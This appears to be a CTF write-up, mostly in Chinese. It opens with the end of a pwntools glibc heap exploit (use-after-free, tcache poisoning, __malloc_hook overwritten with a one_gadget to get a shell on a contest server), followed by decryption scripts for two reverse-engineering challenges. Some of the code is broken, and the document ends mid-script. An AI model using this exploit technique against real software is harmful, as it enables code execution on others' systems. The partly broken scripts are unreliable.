         tcache control chunk, bump a count there, then free/allocate so a
         libc (main_arena-relative) pointer becomes readable -> libc base;
      3. forge another entry pointing at __malloc_hook, write a one_gadget
         there and trigger it with a final add().
    The magic offsets (0x10, 0x80, the 0x500 sendline) are pasted from the
    original run; NOTE(review): they are specific to this binary/libc build.
    """
    #UAF
    add(8)
    delete()
    edit('A'*7 + 'B')        # pad up to the freed chunk's `next` pointer, then leak it via show()
    show()
    r.recvuntil('B')
    heap_base = u64(r.recvuntil('\n', drop=1, timeout=1).ljust(8, '\x00')) - 0x10
    # heap_base + 0x10: looks like the tcache struct address, used as the
    # entry's `key` field (the 2.27-backported double-free check) -- confirm
    # against the shipped libc.
    key = heap_base + 0x10
    edit(p64(0))
    add(0x10)
    delete()
    edit(p64(heap_base+0x10) + p64(key))   # next -> tcache control chunk
    add(0x10)
    add(2)                                 # this allocation lands on the tcache struct
    edit(p8(0)+p8(0x7))                    # presumably sets a bin count to 7 (bin full)
    add(0x20)
    delete()
    add(0x30)
    r.sendline('1'*0x500)    # NOTE(review): purpose not evident from here; kept verbatim
    add(0x20)
    show()
    r.recvuntil('Content: ')
    # leaked pointer is main_arena + 0x80 in this libc (pasted offset)
    libc_addr = u64(r.recvuntil('\n', drop=1).ljust(8, '\x00')) - 0x80 -main_arena
    malloc_hook = libc_addr + libc.sym['__malloc_hook']
    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    realloc = libc_addr + libc.sym['realloc']
    onegad = [0x4f3d5, 0x4f432,0x10a41c]   # one_gadget offsets for libc-2.27
    onegadget = libc_addr + onegad[2]
    confirm('malloc_hook', malloc_hook)
    confirm('onegadget', onegadget)
    add(0x30)
    delete()
    edit(p64(malloc_hook)+ p64(key))       # tcache poisoning: next -> __malloc_hook
    add(0x30)
    add(0x30)                              # second allocation returns __malloc_hook
    edit(p64(onegadget))
    add(0x30)                              # malloc -> hook -> one_gadget


if __name__ == '__main__':
    # Connect once, run the exploit, then hand the socket over to the user.
    # `r` must stay a module global: the helpers above use it directly.
    host, port = '123.60.211.115', 22997
    r = remote(host, port)
    pwn()
    r.interactive()

Re

glass

简单安卓native层逆向,解包后找到so文件直接ida加载就能看见checkflag函数,逻辑简单,三个小加密函数,对着写解密脚本就行

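flag = [
    0xA3, 0x1A, 0xE3, 0x69, 0x2F, 0xBB, 0x1A, 0x84, 0x65, 0xC2,
    0xAD, 0xAD, 0x9E, 0x96, 0x05, 0x02, 0x1F, 0x8E, 0x36, 0x4F,
    0xE1, 0xEB, 0xAF, 0xF0, 0xEA, 0xC4, 0xA8, 0x2D, 0x42, 0xC7,
    0x6E, 0x3F, 0xB0, 0xD3, 0xCC, 0x78, 0xF9, 0x98, 0x3F
]
password = '12345678'


def _ksa(password):
    """Build the 256-entry permutation the native checkflag derives from the password.

    RC4-style key scheduling as lifted from the .so: the swap index
    accumulates S[i] + key[i % len(password)] (mod 256).
    """
    s = list(range(256))
    key = [ord(password[i % len(password)]) for i in range(256)]
    j = 0
    for i in range(256):
        v = s[i]
        j = (j + v + key[i]) % 256
        s[i] = s[j]
        s[j] = v
    return s


def glass_decrypt(cipher, password):
    """Invert checkflag's three transforms and return the plaintext as a str.

    `cipher` is the byte table from the .so (39 bytes here); `password` is
    the 8-char key.  The steps run in the same order the original script
    used: undo the password XOR, undo the chained XOR in strides of three
    (walking down from the end; the stride is bounded so i-2 stays >= 0),
    then strip the keystream of an RC4-style PRGA over _ksa().  Lengths are
    taken from len(cipher) where the original hard-coded 39/38; for 39 bytes
    the behaviour is identical.  NOTE(review): as in the original, the
    keystream step covers only the first len-1 bytes -- preserved, since
    that is what produced the flag.
    """
    s = _ksa(password)
    data = list(cipher)
    n = len(data)
    klen = len(password)

    for i in range(n):
        data[i] ^= ord(password[i % klen])

    for i in range(n - 1, 1, -3):
        data[i - 1] ^= data[i - 2]
        data[i] ^= data[i - 1]
        data[i - 2] ^= data[i]

    j = 0
    for i in range(n - 1):
        v = s[i + 1]
        j = (j + v) % 256
        s[i + 1] = s[j]
        s[j] = v
        data[i] ^= s[(v + s[i + 1]) % 256]

    return ''.join(chr(b) for b in data)


print(glass_decrypt(flag, password))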

ciscn_gift

go 语言逆向,去除了符号表。比赛中未能做出(因为菜鸡最后也没学会怎么手动恢复 go 编译器生成的无符号表 exe;这里出题人还处理掉了 .gopclntab)。

赛后才知道IDA7.6加载的话可以直接自动恢复。应该是利用.STRTAB和另一个记载了函数起始地址的表直接恢复(关于这个恢复原理是本人猜测,还未尝试验证)

官网下载IDA7.6-free版,然后直接分析程序。

在主函数main_main里看到输出flag的代码逻辑,逐字节输出,预设了一个密文表,属于查表计算,主要在于计算每一字节对应的index

main_wtf 是一个递归函数,index 的关键计算公式经优化后为 x = x - 17*(x>>4) + 1,其递归次数的规律符合如下函数(原文此处为图片,本页未保留):

f(n) 的输出是有循环规律的(周期为 8),这里直接给出(原文此处为图片,本页未保留):

将出题人给出的递归深度数据直接模八取余对应查表即可得到flag,脚本如下:

ida_chars =[
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1B, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1F, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x25, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x27, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x2B, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x35, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x39, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x3B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3D, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x3F, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x51, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x55, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x5A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x5E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x69, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6F, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x71, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x7B, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x7D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x85, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x86, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x87, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x89, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x8B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x8C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8D, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8E, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x91, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x92, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x93, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x99, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x9A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x9B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9D, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x9E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x9F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA1, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xA3, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xA5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA6, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xA9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xAA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAB, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAC, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xAE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xAF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xB2, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xB3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB5, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB6, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xB7, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBA, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xBC, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xBD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xBE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC5, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xC6, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xCB, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xCD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCE, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xD1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xD2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD3, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xD5, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xD6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xD7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD8, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD9, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xDA, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xDB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xDC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDD, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDE, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xE1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE3, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xE6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE7, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xEB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEC, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xED, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xEE, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF1, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xF3, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xF5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF6, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF7, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xF9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xFA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFB, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xFD, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]

a = 0x5F53055504525E54
b = 0x3025156540750
c = 0x57

flag_str = ''

for _ in range(8):
i = a % 256
a //= 256
flag_str += chr(i^0x66)

for _ in range(8):
i = b % 256
b //= 256
flag_str += chr(i^0x66)

flag_str += chr(ord('W')^0x66)
print(flag_str)

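def f(n):
    """Return the n-th term of the recurrence f(1) = 2, f(n) = 2*f(n-1) + 2**(2n-3).

    The recurrence has the closed form f(n) = 2**(n-1) + 4**(n-1):
    2*(2**(n-2) + 4**(n-2)) + 2**(2n-3) = 2**(n-1) + 2**(2n-3) + 2**(2n-3)
    = 2**(n-1) + 2**(2n-2). Using it avoids the original's recursion, which
    hit the interpreter's recursion limit for large n and never terminated
    for n < 1.

    Args:
        n: term index, must be >= 1.

    Returns:
        The integer f(n).

    Raises:
        ValueError: if n < 1 (the recurrence is undefined there).
    """
    if n < 1:
        raise ValueError(f"f(n) is only defined for n >= 1, got {n!r}")
    return 2 ** (n - 1) + 4 ** (n - 1)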

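# Lookup table: (word % 8) selects one of these indexes into flag_str.
tmp = [2, 6, 3, 4, 0, 2, 12, 5]

# 256 bytes = 32 little-endian 64-bit words, eight bytes each.
chars = [
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x36, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x21, 0x3D,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x49, 0x01, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xAC, 0x43, 0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xBE, 0xB5, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x61, 0xDC, 0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x0F,
    0x6C, 0x01, 0x00, 0x00, 0x00, 0x00, 0x32, 0xC4, 0x62, 0x02,
    0x00, 0x00, 0x00, 0x00, 0x99, 0xE2, 0xAC, 0x04, 0x00, 0x00,
    0x00, 0x00, 0x2A, 0xC9, 0xFB, 0x10, 0x00, 0x00, 0x00, 0x00,
    0xFD, 0xCD, 0x9E, 0x32, 0x00, 0x00, 0x00, 0x00, 0x70, 0x74,
    0x0D, 0x37, 0x00, 0x00, 0x00, 0x00
]

# Decode each complete eight-byte group as one little-endian word and map it
# to a flag character through `tmp`. A residue of 0 lands on tmp[-1] (tmp[7]),
# exactly as the original `tmp[sum - 1]` lookup did. Iterating over whole
# groups also emits the 32nd word: the original loop only printed a word when
# the *next* group started, so the last one was silently dropped. A trailing
# partial group (fewer than eight bytes) is ignored, as before.
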